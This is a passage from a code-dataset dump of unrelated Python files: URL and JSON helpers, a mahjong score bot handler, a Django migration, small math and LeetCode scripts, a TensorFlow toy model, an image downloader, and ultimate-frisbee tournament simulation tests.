1)\n host = seps[0].split(b'/', 1)[0]\n if len(seps) > 1:\n return host, seps[0], seps[1]\n else:\n return host, seps[0], b''\n\n\ndef addhttp(url, s=False):\n \"\"\" Add 'http://' prefix to url \"\"\"\n \"\"\" Strip 'http://' or https:// prefix to url \"\"\"\n if url[:7] == 'http://':\n return url\n elif url[:8] == 'https://':\n return url\n return (\"https://\" if s else \"https://\") + url \n\ndef addhttp2(url, s=False):\n \"\"\" Add 'http://' prefix to url \"\"\"\n if url[:7] == b'http://':\n return url\n elif url[:8] == b'https://':\n return url\n return (b\"https://\" if s else b\"https://\") + url \n\n\ndef trimhttp(url):\n \"\"\" Strip 'http://' or 'https://' prefix to url \"\"\"\n if url[:7] == 'http://':\n return url[7:]\n elif url[:8] == 'https://':\n return url[8:]\n return url\n\ndef trimhttp2(url):\n \"\"\" Strip 'http://' or 'https://' prefix to url \"\"\"\n if url[:7] == b'http://':\n return url[7:]\n elif url[:8] == b'https://':\n return url[8:]\n return url\n\n\ndef urlpath(url:str) -> str:\n \"\"\" Get url's path(strip params) \"\"\"\n return url.split('?', 1)[0]\n\ndef urlpath2(url:bytes) -> bytes:\n \"\"\" Get url's path(strip params) \"\"\"\n return url.split(b'?', 1)[0]\n\n\ndef urlhost(url:str) -> str:\n \"\"\" Get url's host(domain name) \"\"\"\n return trimhttp(url).split('/', 1)[0]\n\ndef urlhost2(url:bytes) -> bytes:\n \"\"\" Get url's host(domain name) \"\"\"\n return trimhttp2(url).split(b'/', 1)[0]\n\n\ndef try_unquote(s, errors='strict') -> str:\n \"\"\" Unquote url or others strictly, try step:\n first 'utf-8'\n second 'gbk'\n last 'latin-1'\n return None if failed \"\"\"\n for c in ('utf-8', 'gbk', 'latin-1'):\n try:\n return unquote_plus(s, c, errors)\n except:\n continue\n return None\n\n\ndef open_as_bytes_stream(filename) -> _io.BufferedReader:\n \"\"\" If file's size < 2GB, read whole file as BytesIO object \"\"\"\n filesize = os.path.getsize(filename)\n if filesize < MAX_FILE_SIZE_32BIT:\n with open(filename, 'rb') as f:\n return BytesIO(f.read(filesize))\n else:\n return open(filename, 'rb', buffering=BEST_IO_BUFFER_SIZE)\n\n\ndef loadjson(name, objHook=None) -> dict:\n \"\"\" Load json from file and return dict \"\"\"\n try:\n with _io.open(name, encoding='utf-8', errors='replace') as f:\n return json.loads(f.read(), encoding='utf-8', object_hook=objHook)\n except Exception as e:\n if 'BOM' in str(e):\n with _io.open(name, encoding='utf-8-sig', errors='replace') as f:\n return json.loads(f.read(), encoding='utf-8-sig', object_hook=objHook)\n\n\ndef dumpjson(obj:dict, name=None) -> str:\n \"\"\" Dump json(dict) to file \"\"\"\n jstr = json.dumps(obj, indent=4, ensure_ascii=False)\n if name:\n with _io.open(name, 'w') as f:\n f.write(jstr)\n return jstr\n\n\n\nif __name__ == \"__main__\":\n print(\"Identifiers defined by bace3/basic.py:\")\n for line in open(__file__):\n if line[:4] in (\"clas\", \"def \") or line[0].isupper():\n print(line.strip())\n\n\n\n","sub_path":"bace3/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":16254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"38433885","text":"import argparse\nimport codecs\nimport sys\nimport json\n\nreader = codecs.getreader('utf8')\nwriter = codecs.getwriter('utf8')\n\n\ndef write_file(fname, data):\n with open(fname, 'w', encoding='utf-8') as outfile:\n return json.dump(data, reader(outfile), ensure_ascii=False, indent=2)\n\n\ndef read_file(fname):\n f = open(fname, 'r')\n data = json.load(f)\n f.close()\n return data\n\n\nclass classifier:\n\n def __init__(self):\n \"\"\"\n Initializes a new data structure, which is a list of tuples to store data for classification.\n \"\"\"\n self.list_data = {\"authors\": {}, \"emails\": {}, \"description\": \"\", \"corpus\": []}\n\n def add_entry(self, data, label):\n \"\"\"\n adds a new data entry to list of data\n \"\"\"\n # tuple1=(data, label)\n self.list_data[\"corpus\"].append({\"data\": data, \"label\": label})\n\n '''\n\n Add methods to gather_data which contains all data you will need for classification\n\n Add methods to do classification and evaluate it.\n\n '''\n\n\n# the following command was used to produce sample.json from sample.data\n# python3 group_project.py --file sample.json --authors \"jon may\" \"sarik ghazarian\" --description \"knock knock jokes with binary classification by jon of whether the joke was 'funny' to a six year old or 'lame'\" --readfile sample.data --emails jonmay@usc.edu sarik@usc.edu\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Save gathered data into a json file. Read data from saved json file, make a classifier and then evaluate its performance.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--file\", nargs='?', required=True, help=\"input/output file\")\n parser.add_argument(\"--authors\", nargs='+', required=True, help=\"authors' names\")\n parser.add_argument(\"--emails\", nargs='+', required=True, help=\"authors' email addresses\")\n parser.add_argument(\"--description\", nargs='+', required=True, help=\"project description\")\n parser.add_argument(\"--readfile\", nargs='?', default=None,\n help=\"tab separated data file that will be encoded into json and written (clobbers --file). if not present, assume we're writing\")\n\n try:\n args = parser.parse_args()\n except IOError as msg:\n parser.error(str(msg))\n\n if args.readfile is not None:\n cls = classifier()\n cls.list_data[\"description\"] = args.description\n for author in args.authors:\n acount = len(cls.list_data[\"authors\"]) + 1\n cls.list_data[\"authors\"][\"author{}\".format(acount)] = author\n for email in args.emails:\n acount = len(cls.list_data[\"emails\"]) + 1\n cls.list_data[\"emails\"][\"email{}\".format(acount)] = email\n\n f = open(args.readfile, 'r')\n for line in f:\n d = {}\n tup = line.strip().split('\\t')\n cls.add_entry(*tup)\n\n outfile = write_file(args.file, cls.list_data)\n else:\n infile = read_file(args.file)\n\n '''\n infile contains all data you need to do classification\n '''\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"jsonfile.py","file_name":"jsonfile.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"292707973","text":"from DomainService import (\n user_service,\n hanchan_service,\n)\nfrom ApplicationService import (\n request_info_service,\n reply_service,\n)\nfrom use_cases.group_line.CalculateUseCase import CalculateUseCase\n\n\nclass AddPointByTextUseCase:\n\n def execute(\n self,\n text: str,\n ) -> None:\n line_group_id = request_info_service.req_line_group_id\n mention_line_ids = request_info_service.mention_line_ids\n\n if len(mention_line_ids) > 0:\n if len(mention_line_ids) == 1 and len(text[1:].split()) >= 2:\n # ユーザー名に空白がある場合を考慮し、最後の要素をポイントとして判断する\n point = text[1:].split()[-1]\n target_line_user_id = mention_line_ids[0]\n else:\n reply_service.add_message(\n 'ユーザーを指定する場合はメンションをつけてメッセージの末尾に点数を入力してください。1回につき1人を指定するようにしてください。')\n return\n else:\n target_line_user_id = request_info_service.req_line_user_id\n point = text\n\n point = point.replace(',', '')\n\n # 入力した点数のバリデート(hack: '-' を含む場合数値として判断できないため一旦エスケープ)\n isMinus = False\n if point[0] == '-':\n point = point[1:]\n isMinus = True\n\n if not point.isdigit():\n reply_service.add_message(\n '点数は整数で入力してください。',\n )\n return None\n\n if isMinus:\n point = '-' + point\n\n hanchan = hanchan_service.add_or_drop_raw_score(\n line_group_id=line_group_id,\n line_user_id=target_line_user_id,\n raw_score=int(point),\n )\n\n points = hanchan.raw_scores\n\n res = [\n f'{user_service.get_name_by_line_user_id(line_user_id)}: {point}'\n for line_user_id, point in points.items()\n ]\n\n reply_service.add_message(\"\\n\".join(res))\n\n if len(points) == 4:\n CalculateUseCase().execute()\n elif len(points) > 4:\n reply_service.add_message(\n '5人以上入力されています。@[ユーザー名] で不要な入力を消してください。'\n )\n\n return\n","sub_path":"src/use_cases/group_line/AddPointByTextUseCase.py","file_name":"AddPointByTextUseCase.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"339881545","text":"# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (C) 2007-2009 The NOC Project\n# See LICENSE for details\n# ---------------------------------------------------------------------\n\"\"\"\n\"\"\"\nfrom south.db import db\nfrom django.db import models\n\n\nclass Migration:\n\n def forwards(self):\n\n # Model 'EventPriority'\n db.create_table('fm_eventpriority', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('name', models.CharField(\"Name\",max_length=32,unique=True)),\n ('priority', models.IntegerField(\"Priority\")),\n ('description', models.TextField(\"Description\",blank=True,null=True))\n ))\n # Model 'EventCategory'\n db.create_table('fm_eventcategory', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('name', models.CharField(\"Name\",max_length=32,unique=True)),\n ('description', models.TextField(\"Description\",blank=True,null=True))\n ))\n # Mock Models\n EventPriority = db.mock_model(model_name='EventPriority', db_table='fm_eventpriority', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n EventCategory = db.mock_model(model_name='EventCategory', db_table='fm_eventcategory', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n\n # Model 'EventClass'\n db.create_table('fm_eventclass', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('name', models.CharField(\"Name\",max_length=64)),\n ('category', models.ForeignKey(EventCategory,verbose_name=\"Event Category\")),\n ('default_priority', models.ForeignKey(EventPriority,verbose_name=\"Default Priority\")),\n ('variables', models.CharField(\"Variables\",max_length=128,blank=True,null=True)),\n ('subject_template', models.CharField(\"Subject Template\",max_length=128)),\n ('body_template', models.TextField(\"Body Template\")),\n ('last_modified', models.DateTimeField(\"last_modified\",auto_now=True))\n ))\n # Mock Models\n EventClass = db.mock_model(model_name='EventClass', db_table='fm_eventclass', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n\n # Model 'EventClassificationRule'\n db.create_table('fm_eventclassificationrule', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('event_class', models.ForeignKey(EventClass,verbose_name=\"Event Class\")),\n ('name', models.CharField(\"Name\",max_length=64)),\n ('preference', models.IntegerField(\"Preference\", default=1000))\n ))\n\n # Mock Models\n EventClassificationRule = db.mock_model(model_name='EventClassificationRule', db_table='fm_eventclassificationrule', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n\n # Model 'EventClassificationRE'\n db.create_table('fm_eventclassificationre', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('rule', models.ForeignKey(EventClassificationRule,verbose_name=\"Event Classification Rule\")),\n ('left_re', models.CharField(\"Left RE\",max_length=256)),\n ('right_re', models.CharField(\"Right RE\",max_length=256))\n ))\n\n # Mock Models\n ManagedObject = db.mock_model(model_name='ManagedObject', db_table='sa_managedobject', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n Event = db.mock_model(model_name='Event', db_table='fm_event', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n\n # Model 'Event'\n db.create_table('fm_event', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('timestamp', models.DateTimeField(\"Timestamp\")),\n ('managed_object', models.ForeignKey(ManagedObject,verbose_name=\"Managed Object\")),\n ('event_priority', models.ForeignKey(EventPriority,verbose_name=\"Priority\")),\n ('event_category', models.ForeignKey(EventCategory,verbose_name=\"Event Class\")),\n ('event_class', models.ForeignKey(EventClass,verbose_name=\"Event Class\")),\n ('parent', models.ForeignKey(Event,verbose_name=\"Parent\",blank=True,null=True)),\n ('subject', models.CharField(\"Subject\",max_length=256,null=True,blank=True)),\n ('body', models.TextField(\"Body\",null=True,blank=True))\n ))\n\n # Mock Models\n Event = db.mock_model(model_name='Event', db_table='fm_event', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n\n # Model 'EventData'\n db.create_table('fm_eventdata', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('event', models.ForeignKey(Event,verbose_name=Event)),\n ('key', models.CharField(\"Key\",max_length=64)),\n ('value', models.TextField(\"Value\",blank=True,null=True)),\n ('type', models.CharField(\"Type\",max_length=1,choices=[(\">\",\"Received\"),(\"V\",\"Variable\"),(\"R\",\"Resolved\")],default=\">\"))\n ))\n db.create_index('fm_eventdata', ['event_id','key','type'], unique=True, db_tablespace='')\n\n db.send_create_signal('fm', ['EventPriority','EventCategory','EventClass','EventClassificationRule','EventClassificationRE',\n 'Event','EventData'])\n\n def backwards(self):\n db.delete_table('fm_eventdata')\n db.delete_table('fm_event')\n db.delete_table('fm_eventclassificationre')\n db.delete_table('fm_eventclassificationrule')\n db.delete_table('fm_eventclass')\n db.delete_table('fm_eventcategory')\n db.delete_table('fm_eventpriority')\n","sub_path":"fm/migrations/0002_event.py","file_name":"0002_event.py","file_ext":"py","file_size_in_byte":5913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"511220625","text":"\n\nclass Solution:\n def commonChars(self, A):\n dict = {chr(a) : 0 for a in range(97, 123)}\n min_dict = {chr(a) : 0x3f3f for a in range(97, 123)}\n alphabate = [chr(a) for a in range(97, 123)]\n length = len(A)\n res = []\n\n\n if length == 0:\n return res\n for word in A:\n temp_min_dict = {chr(a) : 0 for a in range(97, 123)}\n for alpha in word:\n dict[alpha] += 1\n temp_min_dict[alpha] += 1\n for alpha in alphabate:\n min_dict[alpha] = min(min_dict[alpha], temp_min_dict[alpha])\n\n for item in dict:\n # print(alphabate[item])\n if dict[item] >= length:\n if min_dict[item] != 0:\n for _ in range(0, min_dict[item]):\n res.append(item)\n\n return res\n\nif __name__ == '__main__':\n s = Solution()\n input = [\"cool\",\"lock\",\"cook\"]\n print(s.commonChars(input))\n","sub_path":"source code/Weekly Contest 126-1.py","file_name":"Weekly Contest 126-1.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"231652686","text":"nS= float(input('aantal deeltjes X: '))\n\nNa = (6.020 * (10 ** 23))\nNS = nS * Na\n\nMS = 32.06\nmS = MS * nS\n\nprint(mS)\nprint(NS)\n\n##################################################\n\n# deeltjes vragen\nn_x = float(input('geef het aantal deeltjes zwavel: '))\n\n# gegevens\nm_x = 32.06\nn_a = 6.020 * (10 ** 23)\n\n# formules\nmx = m_x * n_x\nnx = n_x * n_a\n\n# uitvoer\nprint(mx)\nprint(nx)","sub_path":"04-Variabelen/Avogadro.py","file_name":"Avogadro.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"541365454","text":"import tensorflow as tf\nimport numpy as np\n\n\n# import matplotlib as plt\n\n\ndef add_layer(inputs, in_size, out_size, activation_function=None):\n \"\"\"\n 神经层函数\n :param inputs:输入值\n :param in_size:输入的大小\n :param out_size:输出的大小\n :param activation_function:激励函数\n :return:\n \"\"\"\n with tf.name_scope('layer'):\n with tf.name_scope('Weights'):\n Weights = tf.Variable(\n tf.random_normal([in_size, out_size]),\n name='W'\n )\n with tf.name_scope('biases'):\n biases = tf.Variable(\n tf.zeros([1, out_size]) + 0.1,\n name='b'\n )\n with tf.name_scope('Wx_plus_b'):\n # Wx_plus_b = tf.matmul(inputs, Weights) + biases # Wx_plus_b是神经网络未激活的值,tf.matmul()是矩阵的乘法\n Wx_plus_b = tf.add(\n tf.matmul(inputs, Weights),\n biases) # Wx_plus_b是神经网络未激活的值,tf.matmul()是矩阵的乘法\n \"\"\"\n 当激励函数为空时,Wx_plus_b输出就是当前的预测值,\n 不为None时候,就把Wx_plus_b传入到激励函数中去\n \"\"\"\n if activation_function is None:\n output = Wx_plus_b\n else:\n output = activation_function(Wx_plus_b,)\n\n return output\n\n\nif __name__ == '__main__':\n # 1.准备数据\n x_data = np.linspace(-1, 1, 300, dtype=np.float32)[:, np.newaxis]\n noise = np.random.normal(0, 0.05, x_data.shape).astype(np.float32)\n y_data = np.square(x_data) - 0.5 + noise # 定义方程\n\n # 2.利用占位符定义我们所需的神经网络的输入\n with tf.name_scope('inputs'):\n xs = tf.placeholder(tf.float32, [None, 1], name='x_in')\n ys = tf.placeholder(tf.float32, [None, 1], name='y_in')\n\n # 3.定义神经层(输入层、隐藏层、输出层)\n # 构建输入层1个,隐藏层10个,输出层1个的神经网络\n\n # 3.1定义隐藏层\n l1 = add_layer(xs, 1, 10, activation_function=tf.nn.relu)\n # 3.定义输出层(此时的输入就是隐藏层的输出——l1)\n prediction = add_layer(l1, 10, 1, activation_function=None)\n\n with tf.name_scope('loss'):\n loss = tf.reduce_mean(\n tf.reduce_sum(\n tf.square(ys - prediction),\n reduction_indices=[1])\n )\n\n # 让机器学习提升它的准确率\n with tf.name_scope('train'):\n train_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss) # 梯度下降算法\n\n # 初始化变量\n init = tf.global_variables_initializer()\n\n # 定义session\n # with tf.Session() as sess:\n # sess.run(init)\n sess = tf.Session()\n writer = tf.summary.FileWriter(\"logs/\", tf.get_default_graph())\n sess.run(init)\n # 训练,并显示图像\n\n # fig = plt.figure()\n # ax = fig.add_subplot(1, 1, 1)\n # ax.scatter(x_data, y_data)\n # plt.ion() # 本次运行请注释,全局运行不要注释\n # plt.show()\n\n for i in range(2000):\n sess.run(train_step, feed_dict={xs: x_data, ys: y_data})\n if i % 50 == 0:\n # try:\n # ax.lines.remove(lines[0])\n # except Exception:\n # pass\n prediction_value = sess.run(prediction, feed_dict={xs: x_data})\n # plot the prediction\n # lines = ax.plot(x_data, prediction_value, 'r-', lw=5)\n # plt.pause(0.1)\n","sub_path":"ch01/test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"344469309","text":"from fractions import *\n\n# n=10000\n# sum=0\n# for i in range(1,n+1):\n# sum+=Fraction(n,n**2+i**2)\n# print(sum)\n# print(4*sum.numerator/sum.denominator)\n\nfrom decimal import *\n# print(getcontext())\n# n=100000000\n# sum=0\n# for i in range(1,n+1):\n# sum+=Decimal(n)/Decimal(n**2+i**2)\n# print(4*sum)\n# getcontext().prec=10\nn=1000000\npro=1\nfor i in range(3,n,2):\n pro*=Decimal(i**2-1)/Decimal(i**2)\nprint(4*pro)","sub_path":"python/za/getpdf/pi.py","file_name":"pi.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"516225167","text":"# -*- coding: utf-8 -*-\r\n\r\nimport urllib.request\r\n\r\nurl = 'http://mblogthumb2.phinf.naver.net/MjAxODAxMDRfNjQg/MDAxNTE1MDYwMTIxMTU0.1ZIh5H2dnH-ID_eNF2A6YScmvDMOmPMzXYoAbLkElH0g.1l0psKqkW7GsYoGO9s1mEj2j6O-DWzviQo71UOvKNXIg.JPEG.cafeeurope/shutterstock_543297418.jpg?type=w2'\r\n\r\n# 특정 URL로 요청을 수행하기 위한 Request 객체 생성\r\n# 실제 요청이 실행되지 않음(정보만 저장하는 객체)\r\nurl_request = urllib.request.Request(url)\r\n# 실제 요청을 수행하고, 요청의 결과값에 접근할 수 있는 변수 선언\r\nurl_connect = urllib.request.urlopen(url_request)\r\n# 응답받은 데이터의 크기 값(바이트)\r\ndata_size = url_connect.length\r\n\r\n# 한번에 수신할 데이터의 바이트 크기\r\nbuffer_size = 256\r\n# 저장할 파일명\r\nfileName = \"./download_03.jpg\"\r\nwith open(fileName, \"wb\") as f :\r\n # 다운로드 대상의 데이터를 버퍼의 크기만큼\r\n # 지속적으로 읽어들여 전체 데이터를 저장할 때까지\r\n # 반복을 수행\r\n while True :\r\n # 버퍼의 크기만큼 read 기능을 수행\r\n data = url_connect.read(buffer_size)\r\n # 데이터를 모두 읽어온 경우 반복을 중지\r\n if not data :\r\n break\r\n \r\n write_size = f.write(data)\r\n print(write_size)\r\n\r\nurl_connect.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"day_09/web_file_download/web_file_download_03.py","file_name":"web_file_download_03.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"356119965","text":"# test_ultimate.py\n#\n# Right now this has simple tests. In the future, this\n# could hold proper unit tests.\n\nimport pandas as pd\nimport ultimate\nfrom ultimate import (\n Team,\n Game,\n Tournament,\n utils\n)\nfrom ultimate.utils import get_default_parameters\n\nfrom ultimate.tournament import (\n play_eight_team_single_elimination_bracket,\n play_twelve_team_tournament,\n)\nfrom ultimate.team import (\n import_teams,\n get_top_teams_from_region,\n create_teams_from_dataframe,\n)\n\n\n# Get parameters for men's division\nmens_p_a_offense, mens_k, mens_rating_diff_to_victory_margin, game_to = get_default_parameters(\n \"men\"\n)\n\nprint(f\"mens_p_a_offense: {mens_p_a_offense}, mens_k: {mens_k}, game_to: {game_to}\")\n\np_a_offense = 0.7\n\nprint(f\"Using p_a_offense = {p_a_offense}\")\n\n\n#\n# Tests for Team class\n#\nucla = Team(name=\"UCLA\", rating=2200, nickname=\"Smaug\")\nucsb = Team(name=\"UCSB\", rating=2100, nickname=\"Black Tide\")\nucsd = Team(name=\"UCSD\", rating=2000, nickname=\"Air Squids\")\ncal = Team(name=\"Cal\", rating=1900, nickname=\"UGMO\")\nprint(ucla.name, ucla.nickname, ucla.rating, ucla.games_list)\nprint(ucsb.name, ucsb.nickname, ucsb.rating, ucsb.games_list)\nprint(ucsd.name, ucsd.nickname, ucsd.rating, ucsd.games_list)\nprint(cal.name, cal.nickname, cal.rating, cal.games_list)\n\n\n#\n# Tests for Game class\n#\nucla = Team(name=\"UCLA\", rating=2200, nickname=\"Smaug\", games_list=[])\nucsb = Team(name=\"UCSB\", rating=2000, nickname=\"Black Tide\")\nucsd = Team(name=\"UCSD\", rating=1700, nickname=\"Air Squids\")\ncal = Team(name=\"Cal\", rating=1500, nickname=\"UGMO\")\n\n# Game 0\nprint(\"\\nGame 0 (method='random')\")\nucla_vs_ucsb = Game(ucla, ucsb)\nucla_vs_ucsb.play_game(method=\"random\")\nprint(\"Score *should* be only 15-13 or 13-15.\")\n\n\n# Game 1\nprint(\"\\nGame 1\")\nucla_vs_ucsb = Game(ucla, ucsb)\nucla_vs_ucsb.play_game(\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n)\n\n\n# Game 2\nprint(\"\\nGame 2\")\nwinner_vs_ucsd = Game(None, ucsd, child_a=ucla_vs_ucsb)\n\nwinner_vs_ucsd.play_game(\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n)\n\n\n# Tournament 0\nprint(\"\\nTournament 0\")\nsemi1 = Game(ucla, ucsb, level=\"semi\")\nsemi2 = Game(cal, ucsd, level=\"semi\")\nfinals = Game(None, None, semi1, semi2, level=\"final\")\n\nfinals.play_game(\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n)\n\n\n# Tests for playing 8 team bracket\nprint(\"\\nEight team bracket\")\nucla = Team(name=\"UCLA\", rating=2200, nickname=\"Smaug\", games_list=[])\nucsb = Team(name=\"UCSB\", rating=2100, nickname=\"Black Tide\")\nucsd = Team(name=\"UCSD\", rating=2000, nickname=\"Air Squids\")\ncal = Team(name=\"Cal\", rating=1900, nickname=\"UGMO\")\nuw = Team(name=\"UW\", rating=1800, nickname=\"Sundodgers\")\nore = Team(name=\"Oregon\", rating=1700, nickname=\"Ego\")\nwhit = Team(name=\"Whitman\", rating=1600, nickname=\"Sweets\")\nslo = Team(name=\"CalPolySLO\", rating=1500, nickname=\"Slocore\")\n\nteams_list = [ucla, ucsb, ucsd, cal, uw, ore, whit, slo]\n\nplacement = play_eight_team_single_elimination_bracket(\n teams_list,\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n)\n\nprint(placement[0][1].name)\n\n\n# Tests for playing 12-team 1-bid tournament\nprint(\"\\n\\nTest for playing 12-team 1-bid\")\nuw = Team(name=\"UW\", rating=2400, nickname=\"Sundodgers\")\nore = Team(name=\"Oregon\", rating=2300, nickname=\"Ego\")\nslo = Team(name=\"CalPolySLO\", rating=2250, nickname=\"Slocore\")\nucla = Team(name=\"UCLA\", rating=2200, nickname=\"Smaug\", games_list=[])\nstan = Team(name=\"Stanford\", rating=2150, nickname=\"Bloodthirsty\")\nucsb = Team(name=\"UCSB\", rating=2100, nickname=\"Black Tide\")\nucsd = Team(name=\"UCSD\", rating=2000, nickname=\"Air Squids\")\ncal = Team(name=\"Cal\", rating=1900, nickname=\"UGMO\")\nwhit = Team(name=\"Whitman\", rating=1600, nickname=\"Sweets\")\nsdsu = Team(name=\"SDSU\", rating=1400, nickname=\"\")\norst = Team(name=\"Oregon State\", rating=1300, nickname=\"?\")\nwwu = Team(name=\"Western Washington\", rating=1200, nickname=\"Dirt\")\n\nteams_list = [uw, ore, slo, ucla, stan, ucsb, ucsd, cal, whit, sdsu, orst, wwu]\n\nplacement = play_twelve_team_tournament(\n teams_list,\n num_bids=1,\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n)\n\nprint(placement[0][1].name)\n\n\n# Import rankings and regions and sections and ratings\n# Get USAU Ratings and rankings\n\nwomens_ranking_html = r\"Rankings/USAU_team_rankings.women.2020-03-11.html\"\nmens_ranking_html = r\"Rankings/USAU_team_rankings.men.2020-03-11.html\"\n\n# Use pandas html reader to extract dataframe\nresult = pd.read_html(womens_ranking_html)\ndf_women = result[0]\n\nresult = pd.read_html(mens_ranking_html)\ndf_men = result[0]\n\n# Last row contains garbage, so remove it.\ndf_women = df_women.drop(index=len(df_women) - 1)\ndf_men = df_men.drop(index=len(df_men) - 1)\n\n# Convert numeric columns to from string/object to correct type\ncols = [\"Rank\", \"Power Rating\", \"Wins\", \"Losses\"]\ndf_women[cols] = df_women[cols].apply(pd.to_numeric)\ndf_men[cols] = df_men[cols].apply(pd.to_numeric)\n\n\ndef simulate_regionals(\n df,\n region,\n division=\"Division I\",\n num_participants=12,\n num_bids=1,\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n):\n df_teams = get_top_teams_from_region(\n df, region, n=num_participants, division=division\n )\n teams_list = create_teams_from_dataframe(df_teams)\n print(region)\n print(f\"Teams list: {teams_list}\")\n if num_participants == 12:\n placement = play_twelve_team_tournament(\n teams_list,\n num_bids=num_bids,\n method=method,\n rating_diff_to_victory_margin=rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n )\n else:\n raise Exception(\n \"Sorry! Nothing here yet besides a twelve team single bid bracket!\"\n )\n\n return placement\n\n\n#\n# Simulate Men's Northwest Regionals\n#\n\nprint(\"\\n\\nNorthwest Regionals (Men)\\n\")\n# Get top men's team from the northwest\ndf_teams = get_top_teams_from_region(df_men, \"Northwest\", n=12, division=\"Division I\")\nteams_list = create_teams_from_dataframe(df_teams)\nplacement = play_twelve_team_tournament(\n teams_list,\n num_bids=1,\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n)\nprint(placement[0][1].name)\n\n\n#\n# Simulate every men's regionals\n#\n\nregions = sorted(list(set(df_men[\"College Region\"].dropna().to_list())))\n\nfor region in regions:\n print(f\"\\n\\n{region}\\n\")\n placement = simulate_regionals(\n df_men,\n region,\n division=\"Division I\",\n num_participants=12,\n num_bids=1,\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n )\n\n print(\"\\n\", placement[0][1].name)\n","sub_path":"test_ultimate.py","file_name":"test_ultimate.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"22655010","text":"import numpy as np\nimport tensorflow as tf\nimport pandas as pd\nimport cv2\n\nfrom mpi4py import MPI\n\nfrom model import feature_extractor\nfrom utils import sparse_cost_sensitive_loss,onehot,weighted_ce\n\n\nfrom keras.applications.mobilenet_v2 import MobileNetV2\nfrom keras.applications.imagenet_utils import preprocess_input\n\n# from feature_extractor import Feature_extractor\n\n\ndef cv_resize_pad(img,desired_size):\n osize = img.shape[:2]\n ratio = float(desired_size)/max(osize)\n nsize = tuple([int(x*ratio) for x in osize])\n \n img = cv2.resize(img, (nsize[1],nsize[0]))\n dw = desired_size - nsize[1]\n dh = desired_size - nsize[0]\n\n top,bottom = dh//2,dh-(dh//2)\n left,right = dw//2,dw-(dw//2)\n\n color = [0,0,0]\n return cv2.copyMakeBorder(img,top,bottom,left,right,cv2.BORDER_CONSTANT,value=color)\n\ndef load_images(data_dir,resize=None,seq_len=None):\n data_desc = pd.read_csv(data_dir+\"labelsImgPath.csv\",sep=\",\")\n img_list = []\n shapes = []\n for i in data_desc['filename']:\n img_raw = cv2.imread(data_dir+i,cv2.IMREAD_COLOR)\n \n img_list.append(img_raw)\n shapes.append((img_raw.shape[0],img_raw.shape[1]))\n\n\n shapes = np.array(shapes)\n if(resize==None):\n resize = np.int8((np.mean(shapes[:,0])+np.mean(shapes[:,1]))/2.0)\n res_imgs = []\n for img in img_list:\n nimg = cv_resize_pad(img,resize)\n # More augmentation \n res_imgs.append(nimg)\n\n images = np.array(res_imgs)\n \n g_images,labels = generate_seqs(images,data_desc)\n g_images = tf.keras.preprocessing.sequence.pad_sequences(g_images,maxlen=seq_len,dtype='float32')\n return 